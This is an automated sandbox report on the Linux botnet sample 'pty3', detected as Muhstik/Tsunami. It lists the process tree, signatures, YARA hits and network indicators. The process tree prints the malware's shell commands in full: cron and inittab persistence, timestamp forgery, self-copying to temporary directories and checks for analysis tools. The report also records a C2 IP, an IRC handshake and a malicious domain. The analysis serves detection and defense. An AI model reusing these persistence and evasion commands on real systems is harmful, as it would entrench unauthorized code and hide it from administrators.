Play interactive tour

Edit tour

Linux Analysis Report pty3

Overview

General Information

Sample Name:	pty3
Analysis ID:	543493
MD5:	12cedf7cd63208ee8fd9d0359637c46c
SHA1:	6c376c3a9d7811100e0c470fc3d4d05de06fb30b
SHA256:	4a719439027a279b14a05d650691bed6e0a437ae87fb55895406616a55c6c720
Tags:	elflog4j
Infos:

Detection

Muhstik Tsunami

Score:	96
Range:	0 - 100
Whitelisted:	false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Muhstik

Multi AV Scanner detection for submitted file

Yara detected Tsunami

Uses IRC for communication with a C&C

Writes identical ELF files to multiple locations

Sample tries to persist itself using cron

Explicitly modifies time stamps using the "touch" command

Executes the "crontab" command typically for achieving persistence

Uses known network protocols on non-standard ports

Sample contains only a LOAD segment without any section mappings

Writes ELF files to disk

Executes the "grep" command used to find patterns in files or piped streams

Uses the "uname" system call to query kernel version information (possible evasion)

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Detected TCP or UDP traffic on non-standard ports

Sample listens on a socket

Writes crontab like entries to files to /var or /etc typically for achieving persistence

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Executes commands using a shell command-line interpreter

Executes the "rm" command used to delete files or directories

Executes the "touch" command used to create files or modify time stamps

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work

All domains contacted by the sample do not resolve. Likely the sample is an old dropper which does no longer work

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	543493
Start date:	21.12.2021
Start time:	15:41:22
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	pty3
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal96.troj.evad.lin@0/23@8/0
Warnings:	Show All VT rate limit hit for: /dev/shm/pty3

Process Tree

system is lnxubuntu20

pty3 (PID: 5228, Parent: 5118, MD5: 12cedf7cd63208ee8fd9d0359637c46c) Arguments: /tmp/pty3

pty3 New Fork (PID: 5229, Parent: 5228)

sh (PID: 5229, Parent: 5228, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof -x strace > /dev/null"

sh New Fork (PID: 5230, Parent: 5229)

pidof (PID: 5230, Parent: 5229, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof -x strace

pty3 New Fork (PID: 5232, Parent: 5228)

sh (PID: 5232, Parent: 5228, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof -x tcpdump > /dev/null"

sh New Fork (PID: 5233, Parent: 5232)

pidof (PID: 5233, Parent: 5232, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof -x tcpdump

pty3 New Fork (PID: 5236, Parent: 5228)

pty3 New Fork (PID: 5239, Parent: 5236)

sh (PID: 5239, Parent: 5236, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -r"

sh New Fork (PID: 5245, Parent: 5239)

crontab (PID: 5245, Parent: 5239, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -r

pty3 New Fork (PID: 5237, Parent: 5228)

pty3 New Fork (PID: 5240, Parent: 5237)

sh (PID: 5240, Parent: 5237, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /tmp/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/pty3 > /dev/null 2>&1 &\") | crontab -"

sh New Fork (PID: 5242, Parent: 5240)

crontab (PID: 5242, Parent: 5240, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5244, Parent: 5240)

grep (PID: 5244, Parent: 5240, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /tmp/pty3

sh New Fork (PID: 5246, Parent: 5240)

grep (PID: 5246, Parent: 5240, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"

sh New Fork (PID: 5250, Parent: 5240)

sh New Fork (PID: 5252, Parent: 5250)

crontab (PID: 5252, Parent: 5250, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5251, Parent: 5240)

crontab (PID: 5251, Parent: 5240, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

pty3 New Fork (PID: 5238, Parent: 5228)

sh (PID: 5238, Parent: 5228, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/tmp/pty3\" > /etc/inittab2"

sh New Fork (PID: 5241, Parent: 5238)

cat (PID: 5241, Parent: 5238, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab

sh New Fork (PID: 5243, Parent: 5238)

grep (PID: 5243, Parent: 5238, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /tmp/pty3

pty3 New Fork (PID: 5249, Parent: 5228)

sh (PID: 5249, Parent: 5228, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/tmp/pty3\" >> /etc/inittab2"

pty3 New Fork (PID: 5253, Parent: 5228)

sh (PID: 5253, Parent: 5228, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"

sh New Fork (PID: 5254, Parent: 5253)

cat (PID: 5254, Parent: 5253, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2

pty3 New Fork (PID: 5255, Parent: 5228)

sh (PID: 5255, Parent: 5228, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"

sh New Fork (PID: 5256, Parent: 5255)

rm (PID: 5256, Parent: 5255, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2

pty3 New Fork (PID: 5257, Parent: 5228)

sh (PID: 5257, Parent: 5228, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"

sh New Fork (PID: 5258, Parent: 5257)

touch (PID: 5258, Parent: 5257, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab

pty3 New Fork (PID: 5259, Parent: 5228)

pty3 New Fork (PID: 5261, Parent: 5259)

sh (PID: 5261, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty3 /dev/shm/pty3"

sh New Fork (PID: 5263, Parent: 5261)

cp (PID: 5263, Parent: 5261, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty3 /dev/shm/pty3

pty3 New Fork (PID: 5265, Parent: 5259)

pty3 New Fork (PID: 5267, Parent: 5265)

sh (PID: 5267, Parent: 5265, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /dev/shm/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/pty3 > /dev/null 2>&1 &\") | crontab -"

sh New Fork (PID: 5268, Parent: 5267)

crontab (PID: 5268, Parent: 5267, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5269, Parent: 5267)

grep (PID: 5269, Parent: 5267, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /dev/shm/pty3

sh New Fork (PID: 5270, Parent: 5267)

grep (PID: 5270, Parent: 5267, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"

sh New Fork (PID: 5273, Parent: 5267)

sh New Fork (PID: 5275, Parent: 5273)

crontab (PID: 5275, Parent: 5273, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5274, Parent: 5267)

crontab (PID: 5274, Parent: 5267, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

pty3 New Fork (PID: 5266, Parent: 5259)

sh (PID: 5266, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/dev/shm/pty3\" > /etc/inittab2"

sh New Fork (PID: 5271, Parent: 5266)

cat (PID: 5271, Parent: 5266, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab

sh New Fork (PID: 5272, Parent: 5266)

grep (PID: 5272, Parent: 5266, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /dev/shm/pty3

pty3 New Fork (PID: 5276, Parent: 5259)

sh (PID: 5276, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/dev/shm/pty3\" >> /etc/inittab2"

pty3 New Fork (PID: 5277, Parent: 5259)

sh (PID: 5277, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"

sh New Fork (PID: 5278, Parent: 5277)

cat (PID: 5278, Parent: 5277, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2

pty3 New Fork (PID: 5279, Parent: 5259)

sh (PID: 5279, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"

sh New Fork (PID: 5280, Parent: 5279)

rm (PID: 5280, Parent: 5279, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2

pty3 New Fork (PID: 5281, Parent: 5259)

sh (PID: 5281, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"

sh New Fork (PID: 5282, Parent: 5281)

touch (PID: 5282, Parent: 5281, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab

pty3 New Fork (PID: 5283, Parent: 5259)

sh (PID: 5283, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty3 /var/tmp/pty3"

sh New Fork (PID: 5284, Parent: 5283)

cp (PID: 5284, Parent: 5283, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty3 /var/tmp/pty3

pty3 New Fork (PID: 5285, Parent: 5259)

pty3 New Fork (PID: 5287, Parent: 5285)

sh (PID: 5287, Parent: 5285, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /var/tmp/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/pty3 > /dev/null 2>&1 &\") | crontab -"

sh New Fork (PID: 5290, Parent: 5287)

crontab (PID: 5290, Parent: 5287, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5291, Parent: 5287)

grep (PID: 5291, Parent: 5287, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /var/tmp/pty3

sh New Fork (PID: 5292, Parent: 5287)

grep (PID: 5292, Parent: 5287, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"

sh New Fork (PID: 5294, Parent: 5287)

sh New Fork (PID: 5296, Parent: 5294)

crontab (PID: 5296, Parent: 5294, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5295, Parent: 5287)

crontab (PID: 5295, Parent: 5287, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

pty3 New Fork (PID: 5286, Parent: 5259)

sh (PID: 5286, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/var/tmp/pty3\" > /etc/inittab2"

sh New Fork (PID: 5288, Parent: 5286)

cat (PID: 5288, Parent: 5286, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab

sh New Fork (PID: 5289, Parent: 5286)

grep (PID: 5289, Parent: 5286, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /var/tmp/pty3

pty3 New Fork (PID: 5293, Parent: 5259)

sh (PID: 5293, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/var/tmp/pty3\" >> /etc/inittab2"

pty3 New Fork (PID: 5297, Parent: 5259)

sh (PID: 5297, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"

sh New Fork (PID: 5298, Parent: 5297)

cat (PID: 5298, Parent: 5297, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2

pty3 New Fork (PID: 5299, Parent: 5259)

sh (PID: 5299, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"

sh New Fork (PID: 5300, Parent: 5299)

rm (PID: 5300, Parent: 5299, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2

pty3 New Fork (PID: 5301, Parent: 5259)

sh (PID: 5301, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"

sh New Fork (PID: 5302, Parent: 5301)

touch (PID: 5302, Parent: 5301, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab

pty3 New Fork (PID: 5303, Parent: 5259)

sh (PID: 5303, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty3 /var/lock/pty3"

sh New Fork (PID: 5304, Parent: 5303)

cp (PID: 5304, Parent: 5303, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty3 /var/lock/pty3

pty3 New Fork (PID: 5305, Parent: 5259)

pty3 New Fork (PID: 5307, Parent: 5305)

sh (PID: 5307, Parent: 5305, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /var/lock/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/pty3 > /dev/null 2>&1 &\") | crontab -"

sh New Fork (PID: 5310, Parent: 5307)

crontab (PID: 5310, Parent: 5307, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5311, Parent: 5307)

grep (PID: 5311, Parent: 5307, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /var/lock/pty3

sh New Fork (PID: 5312, Parent: 5307)

grep (PID: 5312, Parent: 5307, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"

sh New Fork (PID: 5316, Parent: 5307)

sh New Fork (PID: 5318, Parent: 5316)

crontab (PID: 5318, Parent: 5316, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5317, Parent: 5307)

crontab (PID: 5317, Parent: 5307, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

pty3 New Fork (PID: 5306, Parent: 5259)

sh (PID: 5306, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/var/lock/pty3\" > /etc/inittab2"

sh New Fork (PID: 5308, Parent: 5306)

cat (PID: 5308, Parent: 5306, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab

sh New Fork (PID: 5309, Parent: 5306)

grep (PID: 5309, Parent: 5306, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /var/lock/pty3

pty3 New Fork (PID: 5315, Parent: 5259)

sh (PID: 5315, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/var/lock/pty3\" >> /etc/inittab2"

pty3 New Fork (PID: 5319, Parent: 5259)

sh (PID: 5319, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"

sh New Fork (PID: 5320, Parent: 5319)

cat (PID: 5320, Parent: 5319, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2

pty3 New Fork (PID: 5321, Parent: 5259)

sh (PID: 5321, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"

sh New Fork (PID: 5322, Parent: 5321)

rm (PID: 5322, Parent: 5321, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2

pty3 New Fork (PID: 5323, Parent: 5259)

sh (PID: 5323, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"

sh New Fork (PID: 5324, Parent: 5323)

touch (PID: 5324, Parent: 5323, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab

pty3 New Fork (PID: 5325, Parent: 5259)

sh (PID: 5325, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty3 /var/run/pty3"

sh New Fork (PID: 5326, Parent: 5325)

cp (PID: 5326, Parent: 5325, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty3 /var/run/pty3

pty3 New Fork (PID: 5327, Parent: 5259)

pty3 New Fork (PID: 5329, Parent: 5327)

sh (PID: 5329, Parent: 5327, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /var/run/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/pty3 > /dev/null 2>&1 &\") | crontab -"

sh New Fork (PID: 5332, Parent: 5329)

crontab (PID: 5332, Parent: 5329, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5333, Parent: 5329)

grep (PID: 5333, Parent: 5329, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /var/run/pty3

sh New Fork (PID: 5334, Parent: 5329)

grep (PID: 5334, Parent: 5329, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"

sh New Fork (PID: 5336, Parent: 5329)

sh New Fork (PID: 5338, Parent: 5336)

crontab (PID: 5338, Parent: 5336, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5337, Parent: 5329)

crontab (PID: 5337, Parent: 5329, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

pty3 New Fork (PID: 5328, Parent: 5259)

sh (PID: 5328, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/var/run/pty3\" > /etc/inittab2"

sh New Fork (PID: 5330, Parent: 5328)

cat (PID: 5330, Parent: 5328, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab

sh New Fork (PID: 5331, Parent: 5328)

grep (PID: 5331, Parent: 5328, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /var/run/pty3

pty3 New Fork (PID: 5335, Parent: 5259)

sh (PID: 5335, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/var/run/pty3\" >> /etc/inittab2"

pty3 New Fork (PID: 5339, Parent: 5259)

sh (PID: 5339, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"

sh New Fork (PID: 5340, Parent: 5339)

cat (PID: 5340, Parent: 5339, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2

pty3 New Fork (PID: 5341, Parent: 5259)

sh (PID: 5341, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"

sh New Fork (PID: 5342, Parent: 5341)

rm (PID: 5342, Parent: 5341, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2

pty3 New Fork (PID: 5343, Parent: 5259)

sh (PID: 5343, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"

sh New Fork (PID: 5344, Parent: 5343)

touch (PID: 5344, Parent: 5343, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab

pty3 New Fork (PID: 5260, Parent: 5228)

pty3 New Fork (PID: 5262, Parent: 5260)

sh (PID: 5262, Parent: 5260, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/uname -n"

sh New Fork (PID: 5264, Parent: 5262)

uname (PID: 5264, Parent: 5262, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: /bin/uname -n

cleanup

Yara Overview

Memory Dumps

Source	Rule	Description	Author
5305.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5305.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
5285.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5285.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
5237.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5237.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
5236.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5236.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
5228.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5228.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
5265.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5265.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
5327.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5327.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
5259.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5259.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
Process Memory Space: pty3 PID: 5228	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Process Memory Space: pty3 PID: 5236	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Process Memory Space: pty3 PID: 5237	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Process Memory Space: pty3 PID: 5259	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Process Memory Space: pty3 PID: 5265	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Process Memory Space: pty3 PID: 5285	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Process Memory Space: pty3 PID: 5305	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Process Memory Space: pty3 PID: 5327	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Click to see the 19 entries

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: pty3	Virustotal: Detection: 51%	Perma Link
Source: pty3	Metadefender: Detection: 32%	Perma Link
Source: pty3	ReversingLabs: Detection: 51%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2034743 ET TROJAN ELF/Muhstik Botnet CnC Activity 192.168.2.23:35994 -> 144.172.71.180:8080

Uses IRC for communication with a C&C

Show sources

Source: unknown

IRC traffic detected: 192.168.2.23:35994 -> 144.172.71.180:8080 NICK x86|LOG|i|0|6234378|galassia USER x01 localhost localhost :muhstik-11052018

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: IRC traffic on port 35994 -> 8080
Source: unknown	Network traffic detected: IRC traffic on port 35994 -> 8080

Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443

Source: global traffic

TCP traffic: 192.168.2.23:35994 -> 144.172.71.180:8080

Source: /tmp/pty3 (PID: 5228)

Socket: 127.0.0.1::59000

Jump to behavior

Source: unknown

DNS traffic detected: query: l.deutschland-zahlung.net replaycode: Name error (3)

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 144.172.71.180
Source: unknown	TCP traffic detected without corresponding DNS query: 144.172.71.180
Source: unknown	TCP traffic detected without corresponding DNS query: 144.172.71.180
Source: unknown	TCP traffic detected without corresponding DNS query: 144.172.71.180
Source: unknown	TCP traffic detected without corresponding DNS query: 144.172.71.180
Source: unknown	TCP traffic detected without corresponding DNS query: 144.172.71.180
Source: unknown	TCP traffic detected without corresponding DNS query: 144.172.71.180
Source: unknown	TCP traffic detected without corresponding DNS query: 144.172.71.180
Source: unknown	TCP traffic detected without corresponding DNS query: 144.172.71.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown

DNS traffic detected: queries for: l.deutschland-zahlung.net

Source: LOAD without section mappings

Program segment: 0x100000

Source: classification engine

Classification label: mal96.troj.evad.lin@0/23@8/0

Persistence and Installation Behavior:

Writes identical ELF files to multiple locations

Show sources

Source: /usr/bin/cp (PID: 5304)	File with SHA-256 4A719439027A279B14A05D650691BED6E0A437AE87FB55895406616A55C6C720 written: /run/lock/pty3	Jump to dropped file
Source: /usr/bin/cp (PID: 5263)	File with SHA-256 4A719439027A279B14A05D650691BED6E0A437AE87FB55895406616A55C6C720 written: /dev/shm/pty3	Jump to dropped file
Source: /usr/bin/cp (PID: 5284)	File with SHA-256 4A719439027A279B14A05D650691BED6E0A437AE87FB55895406616A55C6C720 written: /var/tmp/pty3	Jump to dropped file
Source: /usr/bin/cp (PID: 5326)	File with SHA-256 4A719439027A279B14A05D650691BED6E0A437AE87FB55895406616A55C6C720 written: /run/pty3	Jump to dropped file

Sample tries to persist itself using cron

Show sources

Source: /usr/bin/crontab (PID: 5251)	File: /var/spool/cron/crontabs/tmp.l3d2Df	Jump to behavior
Source: /usr/bin/crontab (PID: 5251)	File: /var/spool/cron/crontabs/root	Jump to behavior
Source: /usr/bin/crontab (PID: 5274)	File: /var/spool/cron/crontabs/tmp.OnJidY	Jump to behavior
Source: /usr/bin/crontab (PID: 5274)	File: /var/spool/cron/crontabs/root	Jump to behavior
Source: /usr/bin/crontab (PID: 5295)	File: /var/spool/cron/crontabs/tmp.u6tmyy	Jump to behavior
Source: /usr/bin/crontab (PID: 5295)	File: /var/spool/cron/crontabs/root	Jump to behavior
Source: /usr/bin/crontab (PID: 5317)	File: /var/spool/cron/crontabs/tmp.pRPXld	Jump to behavior
Source: /usr/bin/crontab (PID: 5317)	File: /var/spool/cron/crontabs/root	Jump to behavior
Source: /usr/bin/crontab (PID: 5337)	File: /var/spool/cron/crontabs/tmp.qQwB9I	Jump to behavior
Source: /usr/bin/crontab (PID: 5337)	File: /var/spool/cron/crontabs/root	Jump to behavior

Explicitly modifies time stamps using the "touch" command

Show sources

Source: /bin/sh (PID: 5258)	Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5282)	Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5302)	Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittab	Jump to behavior
